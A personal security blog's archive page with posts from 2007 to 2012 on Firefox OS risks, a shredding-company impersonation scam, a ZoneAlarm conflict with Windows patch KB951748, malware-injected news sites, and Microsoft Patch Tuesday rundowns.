Sponsored by..

Showing posts with label security. Show all posts
Showing posts with label security. Show all posts

Wednesday 4 July 2012

Firefox OS: will it be safe?

Firefox OS is the new name for the "boot to gecko" project by the Mozilla foundation. It's a fully-featured OS built on a Linux core, and this is what Mozilla have to say about it:

The Firefox OS for mobile devices is built on Mozilla’s “Boot to Gecko project” which unlocks many of the current limitations of web development on mobile, allowing HTML5 applications to access the underlying capabilities of a phone, previously only Unix and Linux based mobile OSes available to native applications. Telef√≥nica’s Digital unit joined forces with Mozilla earlier this year to take this work and showcase a new phone architecture where every phone feature (calling, messaging, games, etc.) is an HTML5 application.
Wait.. what? Basically, the browser can interact directly with the operating system.. and this is being done at a time when vendors are trying to keep the browser as seperated as possible from the OS to mitigate against exploits.

This led me to pose the question in another publication: Firefox OS: will it be safe? Well, if you know Betteridge's Law of Headlines then the answer is probably "no".

We have been down this path before. ActiveX promised to allow the browser (in this case Internet Explorer) access to the system to allow it to do clever things. Yes, software authors could get their applications signed to demonstrate that they were trustworthy, but it was still a security nightmare. And despite the apparent death of ActiveX (when was the last time you installed an ActiveX component that wasn't Adobe Flash?) it still features prominently when it comes to patching.

And then there's Java. Java was meant to be safe because it was sandboxed from the rest of the machine it was running on, making it inherently safe. Fast forward to today.. and what is one of the most common vectors for malware infection? Yes, it's Java. Fundamentally the Java security model is broken, as the endless series of patches we see testifies to.

From a security perspective, keeping the browser just as a browser and limiting the interaction is has with the OS is the best approach. But the Firefox OS wants to turn that on its head. And while Mozilla will no doubt put in processes to try to ensure that it will be safe, the examples of Java and ActiveX show how difficult it can be to nail it down.

Why does it matter? There's a lot of hype about mobile malware at the moment, but in my experience it is still an almost insignificant threat. That will change though, as more and more smartphones and tablets are being used for financially sensitive transactions, and fundamentally a smartphone is just a small computer and it can be added to a botnet for evil purposes.

One last consideration is this - getting updates. As (mostly) Android users will know, OS updates tend to dry up shortly after launch leaving the underlying system vulnerable.. although Apple owners tend to get updates for a much longer time. Keeping on top of security threats will require Mozilla, the manufacturers and networks to co-operate closely to keep security updates rolling out. The Firefox OS model closely matched Android rather than Apple.. so Mozilla and its partners have their work cut out here too.

If you're interested, this article I wrote is a slightly different take on the subject.

Tuesday 30 June 2009

Password masking facepalm

A bizarre shot in the security vs usability argument, as reported by El Reg: Masked passwords must go which reports on research saying that masked passwords are more trouble than they are worth.

A key bit of the argument? "Shoulder surfing is largely a phantom problem".. umm yeah, because people's passwords usually just show as blobs or stars so there's no point. If your damned password comes up as plaintext then you can betcha that it WILL be a problem.


Wednesday 27 May 2009

"Dealer warning as police investigate security imposters"

I don't usually recycle press releases, but this one is of interest. It's really aimed at mobile phone dealers and details the possibility of customer poaching through stolen paperwork, but it seems to have good general guidance that applies to most companies.

Dealer warning as police investigate security imposters
CRIMINAL gangs posing as security staff are targeting mobile phone dealers, according to experts.

Scammers are trying to trick staff into handing over confidential data by pretending to be from shredding companies according to one of the UK’s largest operators.

Competitors are even reported to be raiding the bins of dealer with lax security at their premises to uncover useful details about contract expiry dates.

Jim Watson, managing director of Shred Easy, which destroys confidential data for mobile phone dealers, said:

“Scammers are targeting dealers to get their hands on valuable paperwork. There has been a spate of people pretending to be working for Shred Easy and our competitors by trying to trick staff into handing over bags of confidential data that has been safely kept within a store.

“Mobile phone dealers are vigilant in terms of securely storing their data but when it comes to the disposal of that information they must be alert to con artists trying to trick them into handing it over.

“Major operators will suffer dearly and some independent dealers could even be put out of business if the data fell into the wrong hands. The loss of confidential phone numbers, contact details as well as details about contracts and customers would be devastating.

“We have already been in contact with the police and made them aware of the details. I can’t go into details about who was targeted for legal reasons but it was a major mobile phone retailer and we’ve ensured their staff are alert and follow the official policy for dealing with confidential waste.

“Dealers must be also be alert to the fact that their competitors are fighting tooth and nail to get their hands on data and in some cases we’ve heard reports of competitors sifting the bins outside dealerships to get confidential customer details so they can be poached at a later date”

Shred Easy offers five top tips for mobile phone dealers:

1) Always ask for identification
2) Only deal with an accredited shredding company
3) Make use of professional ‘onsite shredding vehicles’
4) Store confidential data securely in store
5) Don’t throw paperwork in the bin

See www.shreadeasy.com

While you might think to challenge someone coming into your business premises, how often do you check that people taking waste away are really who they say they are?

Wednesday 9 July 2008

ZoneAlarm: "The firewall has blocked Internet access to.."

If you have recently patched your Windows computer with KB951748 and have ZoneAlarm installed then you'll probably find that everything has stopped working with a message similar to:
ZoneAlarm Security Alert
The firewall has blocked Internet access to whatever.com ( (HTTP) from your computer (TCP Flags: S)

This is because the Microsoft patch you just applied has made some fairly significant changes to the way your PC looks up internet names (such as web pages, email hosts etc) and ZoneAlarm isn't aware of those changes and is consequently having a panic.

It isn't really a fault with the patch, and given the nature of the change, you can perhaps expect ZoneAlarm not to cope [see note below]. If you really want some more technical background read this article at the Internet Storm Center: Multiple Vendors DNS Spoofing Vulnerability.

As a temporary workaround, the best advice is to deinstall the KB951748 until ZoneAlarm is updated. It is an important update, but you are either going to have to disable ZoneAlarm or remove the patch and at the moment my advice would be to stick with ZoneAlarm.

To remove the patch in Windows XP (Vista will be similar):
  1. Click Start and select Control Panel (or Start.. Settings.. Control Panel depending on your setup).
  2. Open "Add or Remove Programs"
  3. Tick "Show Updates"
  4. Scroll down (probably very near the bottom of the list) to Security Update for Windows XP (KB951748) (Vista may be worded differently, but the key thing to look for is KB951748).
  5. Click Remove
  6. Follow the steps to remove the patch and then reboot
Keep an eye out on the ZoneAlarm Official Announcements forum for updates - hopefully your copy of ZoneAlarm should download a fix for it automatically. When you have downloaded the update for ZoneAlarm, then visit Windows Update and then reapply the patch.

Update 1:
Sandi made the following comment:
It is not necessary to uninstall the patch, or disable/remove Zonealarm. Simply reset the ZoneAlarm database:


"To solve this, just reset the ZA database and the ZA will be "fresh" as when it was first installed:

Boot your computer into the Safe Mode
Navigate to the c:\windows\internet logs folder
Delete the backup.rdb, iamdb.rdb, *.ldb and the tvDebug files in the folder
Clean the Recycle Bin
Reboot into the normal mode
ZA will be just like new with no previous settings or data

Once this is finished, reboot back into the normal mode and in the new network found windows, set the new network to Trusted.
Then do this to ensure the ZA is setup properly:

Make sure your DNS and DHCP server IP's are in your Firewall's Trusted zone. Finding DNS and DCHP servers, etc

1. Go to Run and type in command and hit 'ok', and in the command then type in ipconfig /all then press the enter key. In the returned data list will be a line DNS and DHCP Servers with the IP address(s) listed out to the side. Make sure there is a space between the ipconfig and the /all, and the font is the same (no capitals).
2. In ZA on your machine on the Firewall, open the Zones tab, click Add and then select IP Address. Make sure the Zone is set to Trusted. Add the DNS IP(s) .
3. Click OK and Apply. Then do the same for the DHCP server.
4. The localhost ( must be listed as Trusted.
5. The Generic Host Process (svchost.exe) as seen in the Zone Alarm's Program's list must have server rights for the Trusted Zone.
Plus it must have both Trusted and Internet Access."
Update 2:
ZoneAlarm have a press release with a couple of workarounds here.

Workaround to Sudden Loss of Internet Access Problem

Date Published : 8 July 2008

Date Last Revised : 9 July 2008

Overview : Microsoft Update KB951748 is known to cause loss of internet access for ZoneAlarm users on Windows XP/2000. Windows Vista users are not affected.

Impact : Sudden loss of internet access

Platforms Affected : ZoneAlarm Free, ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Anti-Spyware, and ZoneAlarm Security Suite

Recommended Actions -

Download and install the latest versions which solve the loss of internet access problem here:

  • ZoneAlarm Internet Security Suite
  • ZoneAlarm Pro
  • ZoneAlarm Antivirus
  • ZoneAlarm Anti-Spyware
  • ZoneAlarm Basic Firewall
  • - or follow the directions below.

    Option 1: Move Internet Zone slider to Medium

    1. Navigate to the "ZoneAlarm Firewall" panel
    2. Click on the "Firewall" tab
    3. Move the "Internet Zone" slider to medium

    Option 2: Uninstall the hotfix

    1. Click the "Start Menu"
    2. Click "Control Panel", or click "Settings" then "Control Panel"
    3. Click on "Add or Remove Programs"
    4. On the top of the add/remove programs dialog box, you should see a checkbox that says "show updates". Select this checkbox
    5. Scroll down until you see "Security update for Windows (KB951748)"
    6. Click "Remove" to uninstall the hotfix

    I must say what is kind of annoying about this whole thing is that ZoneAlarm is owned by Checkpoint who will definitely have been in on the whole DNS update issue and could have updated the product in a more timely manner. Many users of ZoneAlarm have been left high and dry because they don't have the technical skills to fix this.

    Wednesday 4 June 2008

    Redmondmag.com and related sites serving up malware

    One notable name that keeps coming up with regards to the latest round of SQL Injection attacks is Redmondmag.com, published by 1105 Media, Inc as well as a number of sister sites. For a publication for IT professionals to be so badly impacted by SQL injection attacks raise some eyebrows.

    A quick bit of Google searching shows how bad it is: a search for sysid72.com "1105 media" shows 35 infected pages belonging to virtualizationreview.com, visualstudiomagazine.com, redmondmag.com, reddevnews.com and certcities.com. Searching for xiaobaishan.net "1105 media" comes up with 121 matches for tcpmag.com and certcities.com. There are similar hits when searching for en-us18.com and locale48.com.

    An alternative search you can do is b.js "1105 media" where this current batch of injected javascripts can clearly be seen (of course, this blog entry will also turn up for the same search string in time!)

    This problem goes back to at least April when redmondmag.com was infected by the nihaorr1.com attack.

    Here's the thing: the sites showing up in Google are not infected at the moment, but they were when Google crawled them. Clearly 1105 Media cleans up the attacks quickly, but it has not yet managed to secure its SQL server against injection attacks. Perhaps 1105 Media should read some of their own articles on the subject (see redmondmag.com/news/article.asp?editorialsid=9928 - visit at your own risk!)

    Monday 14 January 2008

    The BBC iPlayer in a corporate environment

    The BBC have spent a lot of time and money developing the BBC iPlayer it turns out that it's just another P2P application running on Kontiki.

    So, I've written a guide for corporate IT departments giving them a pointer as to what the iPlayer is all about and how to block it - which it turns out should be easy enough!

    Blocking BBC iPlayer, 4OD and Sky-by-Broadband

    Tuesday 24 July 2007

    Empireonline.com compromised

    The popular movie site Empireonline.com was compromised this morning, with a rogue IFRAME - this was around 9am UK time this morning. The site now appears to be fixed.

    The IFRAME connects to a page called g.htm on g.ignfile.cn which appears to be a malware server hosted on in China. For obvious reasons, I'm not including a clickable link but see the screenshot of the source below:

    g.htm loads a couple of IFRAMES and has a web counter.

    014.htm has some nasty obfuscated javascript:

    The other IFRAME is called imags1.htm, this leads to a compromised file on a server called sexbb888.com. It is likely that the server has been hijacked, and the site owners are unaware of the problem.

    Both appear to be using variants of the MS07-017 vulnerability from April 2007, although the nature of the payload is uncertain.

    In any case, the problem appears to be fixed and anyone with a fully patched system should have been protected. Still, it's a good example of how trusted sites can fall prey to malware pushers.

    Wednesday 11 July 2007

    MS07-039 clarification

    Yesterday was Patch Tuesday, and amongst the usual load of vulnerabilities was MS07-039 - Vulnerability in Windows Active Directory Could Allow Remote Code Execution (926122) - however in this case Microsoft are a little vague about exactly which servers are impacted, referring only to "Active Directory Servers".

    Well, what are Active Directory Servers? If you're running an AD environment then all servers are members servers of Active Directory. Does these mean that all servers needs patching, or is it restricted to Domain Controller (DC) and Global Catalog (GC) servers only? Patching DCs and GCs isn't too big a deal.. patching all servers for MS07-039 would be a nightmare.

    One the clue is in Knowledgebase article 926122 which explains that this really is limited to servers performing the DC/GC role:

    A hotfix was created to work around a problem in which the domain controller has to be restarted to let users renew their certificates. However, this hotfix let any user renew a certificate. This security update includes a hotfix to modify this behavior. After you install this security update, authentication is required for certificate renewal.

    After you install this security update, only domain administrators and network administrators can renew certificates. Also, an administrator cannot delegate the right to renew certificates.

    For such a critical vulnerability, Microsoft's wording is particularly vague. It does seem that it doesn't apply to member servers, but just to Domain Controllers (including Global Catalog servers, FSMO servers etc). These are critical servers, so you should patch them soon before the bad guys get to them.

    Wednesday 9 May 2007

    Patch Tuesday

    A number of nasty looking vulnerabilities. These are my takes on the seriousness of these flaws, you should evaluate them against your own organisation.

    MS07-026 Vulnerabilities in Microsoft Exchange Could Allow Remote Code Execution (931832)
    A series of flaws in Microsoft Exchange 2003 and 2007, the most serious of which is a MIME decoding flaw which can allow a remote attacker to take complete control of the system through a specially crafted email message. This is an extremely serious problem because most corporate firewalls will not offer any protection against messages of this type. There are no known current exploits, but these usually come about very quickly after the vulnerability is announced.
    Client impact: low
    Server impact: high

    MS07-029 Vulnerability in Windows DNS RPC Interface Could Allow Remote Code Execution (935966)
    A critical flaw in the DNS server service can allow a remote attacker to take complete control of a system. This is clearly a significant threat to any servers running the DNS service role and will patching as soon as possible. This is being actively exploited at the moment. Corporate firewalls will mitigate against this somewhat, until an infected machine enters your network.
    Client impact: low
    Server impact: high

    MS07-023 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (934233)
    A depressingly familiar flaw in MS Office impacting Excel 2000, 2002, 2003 and 2007 and even Excel 2004 for the Mac. WSUS or some other patching method should be used to roll these out to client workstations. Safe server practices should mean that this is not so important for corporate servers.
    Client impact: high
    Server impact: low

    MS07-024 Vulnerabilities in Microsoft Word Could Allow Remote Code Execution (934232)
    Another Office flaw, this time for Word 2000, 2002 and 2003 plus Microsoft Works 2004, 2005 and 2006 - but not Word 2007. This is being actively exploited and should be authorised for rollout as soon as possible.. Office 2000 installations will require manual remediation.
    Client impact: high
    Server impact: low

    MS07-025 Vulnerability in Microsoft Office Could Allow Remote Code Execution (934873)
    A vulnerability in the way Office handles drawing objects can be exploited by a specially crafted Office document (e.g. attached to an email) or an object embedded in a web site. This affects Office 2000, 2002, 2003 and 2007 and also Office 2004 for the Mac - primarily the Excel, Publisher and FrontPage components. It also impacts Excel Viewer 2003. This should be authorised for rollout to clients as soon as possible. Office 2000 will require manual remediation.
    Client impact: high
    Server impact: low

    MS07-027 Cumulative Security Update for Internet Explorer (931768)
    Various flaws in IE6 and IE7 on Windows 2000, XP, 2003 and Vista. Safe practice on servers should mitigate against this (i.e. restrict use of IE to Windows Update only). Some of these flaws are being actively exploited, so patch as soon as possible.
    Client impact: high
    Server impact: low

    MS07-028 Vulnerability in CAPICOM Could Allow Remote Code Execution (931906)
    Well, obviously high if you use this product, else few people will be at risk.
    Client impact: low
    Server impact: low

    Wednesday 10 January 2007

    Patch Tuesday - January

    A very small number of patches this month, none of which are critical for servers (assuming you don't read email, process office documents or surf the web on a server) and which may not even require a reboot on most client PCs. I've ordered these roughly in order of importance.

    MS07-004 Vulnerability in Vector Markup Language Could Allow Remote Code Execution (929969)
    This addresses an active exploit in IE and should be applied as soon as possible.
    Client impact: high
    Server impact: low

    MS07-003 Vulnerabilities in Microsoft Outlook Could Allow Remote Code Execution (925938)
    A series of potentially serious flaws that could lead to an exploit if the user opens a specially crafted email message. Outlook 2000 is vulnerable to this, but cannot be patched via WSUS so this would need to be applied manually where possible. Replaces MS06-055.
    Client impact: high
    Server impact: low

    MS07-002 Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (927198)
    Similar to MS07-003, and Excel 2000 is similarly impacted with no WSUS remediation.
    Client impact: high
    Server impact: low

    MS07-001 Vulnerability in Microsoft Office 2003 Brazilian Portuguese Grammar Checker Could Allow Remote Code Execution (921585)
    This only impacts Office 2003 with the Brazilian Portuguese language pack. It should be a big problem for most users.
    Client impact: low
    Server impact: low